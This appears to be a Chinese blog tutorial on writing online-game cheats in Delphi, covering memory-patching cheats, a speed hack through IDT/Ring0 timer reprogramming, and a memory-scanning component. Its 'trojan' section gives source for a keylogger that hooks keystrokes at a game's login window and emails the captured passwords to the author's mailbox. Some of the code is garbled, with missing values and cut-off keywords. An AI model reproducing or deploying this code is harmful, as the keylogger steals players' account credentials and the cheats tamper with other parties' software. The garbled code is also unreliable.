这就是这类游戏外挂的程序实现部份的方法,好了,有了此方法,我们就有了理性的认识,我们看看实际例子,提升一下我们的感性认识吧,下面就是XX游戏的外挂代码,我们照上面的方法对应去研究一下吧:constResourceOffset: dword = $;resource: dword = ;ResourceOffset1: dword = $;resource1: dword = ;ResourceOffset2: dword = $0043FA50;resource2: dword = 1280185;ResourceOffset3: dword = $0043FA54;resource3: dword = ;ResourceOffset4: dword = $0043FA58;resource4: dword = ;varhw: HWND;pid:h: THtt: Cbeginhw := FindWindow('XX', nil);if hw = 0 thenEGetWindowThreadProcessId(hw, @pid);h := OpenProcess(PROCESS_ALL_ACCESS, false, pid);if h = 0 thenEif flatcheckbox1.Checked=true thenbeginWriteProcessMemory(h, Pointer(ResourceOffset), @Resource, sizeof(Resource), tt);WriteProcessMemory(h, Pointer(ResourceOffset1), @Resource1, sizeof(Resource1), tt);if flatcheckbox2.Checked=true thenbeginWriteProcessMemory(h, Pointer(ResourceOffset2), @Resource2, sizeof(Resource2), tt);WriteProcessMemory(h, Pointer(ResourceOffset3), @Resource3, sizeof(Resource3), tt);WriteProcessMemory(h, Pointer(ResourceOffset4), @Resource4, sizeof(Resource4), tt);MessageBeep(0);CloseHandle(h);   这个游戏是用了多地址对所要提交的数据进行了校验,所以说这类游戏外挂制作并不是很难,最难的是要找到这些地址。  木马式外挂  木马式外挂,可能大多像木马吧,是帮助做外挂的人偷取别人游戏的帐号及密码的东东。因为网络上有此类外挂的存在,所以今天不得不说一下(我个人是非常讨厌这类外挂的,请看过本文的朋友不要到处乱用此技术,谢谢合作)。要做此类外挂的程序实现方法很多(比如HOOK,键盘监视等技术),因为HOOK技术对程序员的技术要求比较高并且在实际应用上需要多带一个动态链接库,所以在文中我会以键盘监视技术来实现此类木马的制作。键盘监视技术只需要一个.exe文件就能实现做到后台键盘监视,这个程序用这种技术来实现比较适合。  在做程序之前我们必需要了解一下程序的思路:  1、我们首先知道你想记录游戏的登录窗口名称。  2、判断登录窗口是否出现。  3、如果登录窗口出现,就记录键盘。  4、当窗口关闭时,把记录信息,通过邮件发送到程序设计者的邮箱。  第一点我就不具体分析了,因为你们比我还要了解你们玩的是什么游戏,登录窗口名称是什么。从第二点开始,我们就开始这类外挂的程序实现之旅:  那么我们要怎么样判断登录窗口虽否出现呢?其实这个很简单,我们用FindWindow函数就可以很轻松的实现了:HWND FindWindow(LPCTSTR lpClassName, // pointer to class nameLPCTSTR lpWindowName // pointer to window name);   实际程序实现中,我们要找到'xx'窗口,就用FindWindow(nil,'xx')如果当返回值大于0时表示窗口已经出现,那么我们就可以对键盘信息进行记录了。  先首我们用SetWindowsHookEx设置监视日志,而该函数的用法如下:HHOOK SetWindowsHookEx(int idHook, // type of hook to installHOOKPROC lpfn, // address of hook procedureHINSTANCE hMod, // handle of application instanceDWORD dwThreadId // identity of thread to install hook for );   在这里要说明的是在我们程序当中我们要对HOOKPROC这里我们要通过写一个函数,来实现而HINSTANCE这里我们直接用本程序的HINSTANCE就可以了,具体实现方法为:hHook := SetWindowsHookEx(WH_JOURNALRECORD, HookProc, HInstance, 0);   而HOOKPROC里的函数就要复杂一点点:function HookProc(iCode: wParam: wP lParam: lParam): LR begin if findedtitle then file://如果发现窗口后begin if (peventmsg(lparam)^.message = WM_KEYDOWN) then file://消息等于键盘按下hookkey := hookkey + Form1.Keyhookresult(peventMsg(lparam)^.paramL, peventmsg(lparam)^.paramH); file://通过keyhookresult(自定义的函数,主要功能是转换截获的消息参数为按键名称。我会在文章尾附上转化函数的)转换消息。if length(hookkey) & 0 then file://如果获得按键名称begin Write(hookkeyFile,hookkey); file://把按键名称写入文本文件hookkey := '';
  以上就是记录键盘的整个过程,简单吧,如果记录完可不要忘记释放呀,UnHookWindowsHookEx(hHook),而hHOOK,就是创建setwindowshookex后所返回的句柄。  我们已经得到了键盘的记录,那么现在最后只要把记录的这些信息发送回来,我们就大功造成了。其他发送这块并不是很难,只要把记录从文本文件里边读出来,用DELPHI自带的电子邮件组件发一下就万事OK了。代码如下:assignfile(ReadFile,'hook.txt'); file://打开hook.txt这个文本文件reset(ReadFile); file://设为读取方式try While not Eof(ReadFile) do file://当没有读到文件尾begin Readln(ReadFile,s,j); file://读取文件行body:=body+s;
finally closefile(ReadFile); file://关闭文件 nmsmtp1.EncodeType:=uuM file://设置编码nmsmtp1.PostMessage.Attachments.Text:=''; file://设置附件nmsmtp1.PostMessage.FromAddress:=''; file://设置源邮件地址nmsmtp1.PostMessage.ToAddress.Text:=''; /设置目标邮件地址nmsmtp1.PostMessage.Body.Text:='密码'+' '+ file://设置邮件内容nmsmtp1.PostMessage.Subject:='password'; file://设置邮件标题nmsmtp1.SendM file://发送邮件   这个程序全部功能已经实现,编编试试。  加速型外挂  原本我一直以为加速外挂是针对某个游戏而写的,后来发现我这种概念是不对的,所谓加速外挂其实是修改时钟频率达到加速的目的。  以前DOS时代玩过编程的人就会马上想到,这很简单嘛不就是直接修改一下8253寄存器嘛,这在以前DOS时代可能可以行得通,但是windows则不然。windows是一个32位的操作系统,并不是你想改哪就改哪的(微软的东东就是如此霸气,说不给你改就不给你改),但要改也不是不可能,我们可以通过两种方法来实现:第一是写一个硬件驱动来完成,第二是用Ring0来实现(这种方法是CIH的作者陈盈豪首用的,它的原理是修改一下IDE表-&创建一个中断门-&进入Ring0-&调用中断修改向量,但是没有办法只能用ASM汇编来实现这一切*_*,做为高级语言使用者惨啦!),用第一种方法用点麻烦,所以我们在这里就用第二种方法实现吧~~~  在实现之前我们来理一下思路吧:  1、我们首先要写一个过程在这个过程里嵌入汇编语言来实现修改IDE表、创建中断门,修改向量等工作  2、调用这个过程来实现加速功能  好了,现在思路有了,我们就边看代码边讲解吧:  首先我们建立一个过程,这个过程就是本程序的核心部份:procedure SetRing(value:word); const ZDH = $03; // 设一个中断号varIDT : array [0..5] // 保存IDT表OG : //存放旧向量beginasmpush ebxsidt IDT //读入中断描述符表mov ebx, dword ptr [IDT+2] //IDT表基地址add ebx, 8*ZDH //计算中断在中断描述符表中的位置cli //关中断mov dx, word ptr [ebx+6] shl edx, 16d mov dx, word ptr [ebx] mov [OG], edx mov eax, offset @@Ring0 //指向Ring0级代码段mov word ptr [ebx], ax //低16位,保存在1,2位shr eax, 16dmov word ptr [ebx+6], ax //高16位,保存在6,7位int ZDH //中断mov ebx, dword ptr [IDT+2] //重新定位add ebx, 8*ZDHmov edx, [OG]mov word ptr [ebx], dxshr edx, 16dmov word ptr [ebx+6], dx //恢复被改了的向量pop ebxjmp @@exitasm //到exitasm处@@Ring0: //Ring0,这个也是最最最核心的东东mov al,$34 //写入8253控制寄存器out $43,almov ax,value //写入定时值out $40,al //写定时值低位mov al,ahout $40,al //写定时值高位iretd //返回@@exitasm:   最核心的东西已经写完了,大部份读者是知其然不知其所以然吧,呵呵,不过不知其所以然也然。下面我们就试着用一下这个过程来做一个类似于&变速齿轮&的一个东东吧!  先加一个窗口,在窗口上放上一个trackbar控件把其Max设为20,Min设为1,把Position设为10,在这个控件的Change事件里写上:+inttostr(1742+(10-trackbar1.Position)*160)));   因为windows默认的值为$1742,所以我们把1742做为基数,又因为值越小越快,反之越慢的原理,所以写了这样一个公式,好了,这就是&变速齿轮&的一个Delphi+ASM版了(只适用于win9X),呵呵,试一下吧,这对你帮助会很大的,呵呵。  在win2000里,我们不可能实现在直接对端口进行操作,Ring0也失了效,有的人就会想到,我们可以写驱动程序来完成呀,但在这里我告诉你,windows2000的驱动不是一个VxD就能实现的,像我这样的低手是写不出windows所用的驱动WDM的,没办法,我只有借助外力实现了,ProtTalk就是一个很好的设备驱动,他很方便的来实现对低层端口的操作,从而实现加速外挂。  1、我们首先要下一个PortTalk驱动,他的官方网站是  2、我们要把里面的prottalk.sys拷贝出来。  3、建立一个Protalk.sys的接口(我想省略了,大家可以上文件自己看吧)  4、实现加速外挂。  下面就讲一下这程序的实现方法吧,如果说用ProtTalk来操作端口就容易多了,比win98下用ring权限操作方便。  1、新建一个工程,把刚刚下的接口文件和Protalk.sys一起拷到工程文件保存的文件夹下。  2、我们在我们新建的工程加入我们的接口文件useswindows,ProtTalk&&   3、我们建立一个过程procedure SetRing(value:word); beginif not OpenPortToutportb($43,$34);outportb($40,lo(Value));outprotb($40,hi(value));ClosePortT   4、先加一个窗口,在窗口上放上一个trackbar控件把其Max设为20,Min设为1,把Position设为10,在这个控件的Change事件里写上:+inttostr(1742+(10-trackbar1.Position)*160)));  就这么容易。在内存中修改数据的网游外挂现在很多游戏都是把一些信息存入内存单元的,那么我们只需要修改具体内存值就能修改游戏中的属性,很多网络游戏也不外于此。  曾几何时,一些网络游戏也是可以用内存外挂进行修改的,后来被发现后,这些游戏就把单一内存地址改成多内存地址校验,加大了修改难度,不过仍然可以通过内存分析器可以破解的。诸如&FPE&这样的软件便提供了一定的内存分析功能。  &FPE&是基于内存外挂的佼佼者,是家喻户晓的游戏修改软件。很多同类的软件都是模仿&FPE&而得到玩家的认可。而&FPE&实现的技术到现在都没有公开,很多人只能够通过猜测&FPE&的实现方法,实现同类外挂。笔者也曾经模仿过&FPE&实现相应的功能,如&内存修改&、&内存查询&等技术。稍后会对此技术进行剖析。  既然要做内存外挂,那么就必须对Windows的内存机制有所了解。计算机的内存(RAM)总是不够用的,在操作系统中内存就有物理内存和虚拟内存之分,因为程序创建放入物理内存的地址都是在变化的,所以在得到游戏属性时并不能够直接访问物理内存地址。在v86模式下,段寄存器使用方法与实模式相同,那么可以通过段寄存器的值左移4位加上地址偏移量就可以得到线性地址,而程序创建时在线性地址的中保留4MB-2GB的一段地址,游戏中属性便放于此。在windows中把虚拟内存块称之为页,而每页为4KB,在访问内存时读取游戏属性时,为了不破坏数据完整性的快速浏览内存地址值,最好一次访问一页。  在操作进程内存时,不需要再使用汇编语言,Windows中提供了一些访问进程内存空间的API,便可以直接对进程内存进行操作。但初学者一般掌握不了这一项技术,为了使初学者也能够对内存进行操作,做出基于内存控制的外挂,笔者把一些内存操作及一些内存操作逻辑进行了封装,以控件形式提供给初学者。控件名为:MpMemCtl。  初学者在使用此控件时,要先安装外挂引擎控件包(在此后的每篇文章中外挂引擎控件包仅提供与该文章相应的控制控件),具体控件安装方式,请参阅《Delphi指南》,由于篇幅所限,恕不能详细提供。  在引擎安装完成后,便可以在Delphi中的组件栏内,找到[MP GameControls]控件组,其中可以找到[MpMemCtl]控件。初学者可以使用此控件可以对内存进行控制。  一、 得到进程句柄  需要操作游戏内存,那么首先必须确认要操作的游戏,而游戏程序在运行时所产生的每一个进程都有一个唯一的句柄。  使用控件得到句柄有三种方法:  1、 通过控件打开程序得到句柄。  在控件中,提供了startProgram方法,通过该方法,可以打开程序得到进程句柄,并且可以返回进程信息。PProcInfo: PROCESS_INFORMATION;MpMemCtl.startProgram( FilePath:S //程序路径 var aProc_Info:PROCESS_INFORMATION //进程信息):BOOLEAN   该方法提供了两个参数,第一个参数为要打开的程序路径,第二个参数为打开程序后所创建进程的进程信息。使用这个方法在得到进程信息的同时,并给控件的ProcHandle(进程句柄)属性进行了附值,这时可以使用控件直接对内存进程读写操作。其应用实例如下:Var PProcInfo: PROCESS_INFORMATION;begin MpMemCtl1.startProgram(edit1.Text, PProcInfo)   2、通过控件根据程序名称得到句柄。  在控件中,对系统运行进程也有了相应的描述,控件提供了两个方法,用于根据程序名称得到相应的进程句柄。getProcIDs()可以得到系统现在所运行的所有程序的名称列表。getProcID()可以通过所运行程序名称,得到相应进程的句柄。getProcIDs():TStrings //所返回为多行字符串型getProcID(aProcName:String //应用程序名称):T //应用程序进程句柄   其应用实例如下:  首先可以通过getProcIDs()并把参数列表返回ComboBox1.Items里:ComboBox1.Items:=MpMemCtl1.getProcIDs();   接着可以通过getProcID()得到相应的进程句柄,并给控件的ProcHandle(进程句柄)属性进行了附值,这时可以使用控件直接对内存进程读写操作。MpMemCtl1.getProcID(ComboBox1.Text)   3、通过控件根据窗口名称得到句柄。  在控件中,控件提供了两个方法,用于根据窗口名称得到相应的进程句柄。可以通过getALLWindow()得到所有在进程中运行的窗口。getWinProcHandle()可以通过相应的窗口名称,得到相应的进程的句柄。getALLWindow(aHandle:THandle //传入当前窗口的句柄):TS //返回当前所有运行窗口的名称getWinProcHandle(aWindowName:String //传入当前窗口名称):T //返回窗口的句柄   其应用实例如下:  首先可以通过getALLWindow ()并把参数列表返回ComboBox1.Items里:ComboBox1.Items:=MpMemCtl1. getALLWindow(Handle);   接着可以通过getWinProcHandle ()得到相应的进程句柄,并给控件的ProcHandle(进程句柄)属性进行了附值,这时可以使用控件直接对内存进程读写操作。MpMemCtl1. getWinProcHandle (ComboBox1.Text);   二、使游戏暂停  在程序中,为了便于更好的得到游戏的当前属性。在控件中提供了游戏暂停方法。只需要调用该方法,游戏便可以自由的暂停或启动。该方法为:pauseProc()pauseProc( aType:integer //控制类型)   控制类型只能够传入参数0或1,0代表使游戏暂停,1代表取消暂停。其应用实例如下:MpMemCtl1.pauseProc(0); //暂停游戏MpMemCtl1.pauseProc(1); //恢复暂停   三、读写内存值  游戏属性其实寄存在内存地址值里,游戏中要了解或修改游戏属性,可以通过对内存地值的读出或写入完成。  通过控件,要读写内存地址值很容易。可以通过调用控件提供的getAddressValue()及setAddressValue()两个方法即可,在使用方法之前,要确认的是要给ProcHandle属性进行附值,因为对内存的操作必须基于进程。给ProcHandle属性附值的方法,在上文中已经介绍。无论是对内存值进行读还是进行写,都要明确所要操作的内存地址。getAddressValue( //读取内存方法aAddress: //操作的内存地址var aValue:integer //读出的值):BsetAddressValue( //写入内存方法aAddress: //操作的内存地址aValue:integer //写入的值):B   要注意的是,传入内存地址时,内存地址必须为Pointer型。其应用实例如下:  读取地址值(如果&主角&等级所存放的地址为4549632):var aValue:Ibegin MpMemCtl1.getAddressValue(Pointer(&4549632&),aValue);   这时aValue变量里的值为内存地址[4549632]的值。  写入地址值:MpMemCtl1.setAddressValue(Pointer(Strtoint(&4549632&)),strtoint(87));   通过该方法可以把要修改的内存地址值改为87,即把&主角&等级改为87。  四、内存地址值分析  在游戏中要想要到游戏属性存放的内存地址,那么就对相应内存地址进行内存分析,经过分析以后才可得到游戏属性存放的人存地址。  控件提供两种基于内存地址的分析方法。一种是按精确地址值进行搜索分析,另一种是按内存变化增减量进行搜索分析。  1、 如果很明确的知道当前想要修改的地址值,那么就用精确地址值进行搜索分析  在游戏中,需要修改人物的经验值,那么首先要从游戏画面上获得经验值信息,如游戏人物当前经验值为9800,需要把经验值调高,那么这时候就需要对人物经验值在内存中搜索得到相应的内存地址,当然很可能在内存中地址值为9800的很多,第一次很可能搜索出若干个地址值为9800的地址。等待经验值再有所变化,如从9800变为了20000时,再次进行搜索,那么从刚刚所搜索到的地址中,便可以进一步获得范围更少的内存地址,以此类推,那么最后可得到经验值具体存放的地址。  如要用控件来实现内存值精确搜索,其实方法很简单,只需要调用该控件的Search()方法即可。但是在搜索之前要确认搜索的范围,正如前文中所说:&而程序创建时在线性地址的中保留4MB-2GB的一段地址&,所以要搜索的地址应该是4MB-2GB之间,所以要把控件的MaxAddress属性设为2GB,把控件的MinAddress属性设为4MB。还有一个需要确认的是需要搜索的值,那么应该把SearchValue属性设置为当前搜索的值。如果需要显示搜索进度那么可以把ShowGauge属性挂上一个相应的TGauge控件(该控件为进度条控件)。search( isFirst:Boolean //是否是第一次进行搜索):Boolean   在搜索分析时为了提高搜索效率、实现业务逻辑,那么需要传入一个参数,从而确认是否是第一次进行内存。其应用实例如下:maxV:=24;maxV:=2*MaxV;minV:=4*;V:=StrToInt(Edit1.Text);with MpMemCtl1 dobegin MaxAddress:=maxV; MinAddress:=minV; SearchValue:=SeaarchV; ShowGauge:=Gauge1; Search(first)if first then first:=   2、 如果不明确当前想要修改的地址值,只知道想要修改的值变大或变小,那么就按内存变化增减量进行搜索分析。  如有些游戏的人物血值不显示出来,但要对人物血值进行修改,那么只有借助于内存量增减变化而进行搜索分析出该人物血值存放的地址。如果人物被怪物打了一下,那么人物血值就会减少,那么这时候就用减量进行搜索分析,如果人物吃了&血&人物血值就会增加,那么这时候就用增量进行搜索分析。经过不断搜索,最后会把范围放血值的内存地址给搜索出来。  如要用控件来实现内存值精确搜索,其实方法很简单,只需要调用该控件的compare()方法即可。MaxAddress、MinAddress属性设置上面章节中有详细介绍,在此不再重提。在此分析中不需要再指定SearchValue属性。如果需要显示搜索进度那么可以把ShowGauge属性挂上一个相应的TGauge控件。compare ( isFirst:Boolean //是否是第一次进行搜索 aType:Integer //搜索分析类型):Boolean   在搜索分析时为了提高搜索效率、实现业务逻辑,那么需要传入一个参数,从而确认是否是第一次进行内存。搜索分析类型有两种:如果参数值为0,那么就代表增量搜索。如果参数值为1,那么就代表减量搜索。其应用实例如下:if RadioButton1.Checked then v:=0else v:=1; maxV:=24; maxV:=2*MaxV; minV:=4*; with MpMemCtl1 do begin  MaxAddress:=maxV;  MinAddress:=minV;  ShowGauge:=Gauge1;  compare(first,v);if first then first:=   五、得到内存地址值  在控件中,提供获得分析后内存地址列表的方法,只需要调用getAddressList()方法,便可以获得分析过程中或分析结果地址列表。但如果使用的是按内存变化增减量进行搜索分析的方法,那么第一次可能会搜索出来很多的地址,致使返回速度过长,那么建议使用getAddressCount()方法确定返回列表为一定长度后才给予返回。getAddressList():TStrings //返回地址字符串列表getAddressCount():Integer //返回地址字符串列表长度   其应用实例如下:if MpMemCtl1.getAddressCount() &100 then listbox1.Items:=MpMemCtl1.getAddressList();   通过以上五个步骤,便可以整合成一个功能比较完备的,基于内存控制方法的游戏外挂。有了&FPE&的关键部份功能。利用此工具,通过一些方法,不仅仅可以分析出来游戏属性单内存地址,而且可以分析出一部份多内存游戏属性存放地址。
本文已收录于以下专栏:
相关文章推荐
网络游戏外挂编写原理
  所谓游戏外挂,其实是一种游戏外辅程序,它可以协助玩家自动产生游戏动作、修改游戏网络数据包以及修改游戏内存数据等, 以实现玩家用最少的时间和金钱去完成...
======================================================
注:本文源代码点此下载
=============================...
首先下bp WSASend断点,然后点击“整理”按钮
然后ctrl+f9,每一步往下跟踪
====================
发现,始终跟不到这个整理的call,分...
1、动作式,所谓动作式,就是指用API发命令给窗口或API控制鼠标、键盘等,使游戏里的人物进行流动或者攻击,最早以前的“石器”外挂就是这种方式。(这种外挂完全是垃圾,TMD,只要会一点点API的人都知...
他的最新文章
讲师:宋宝华
讲师:何宇健
您举报文章:
举报原因:
原文地址:
原因补充:
(最多只允许输入30个字)}

我要回帖

更多关于 dnf封包 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信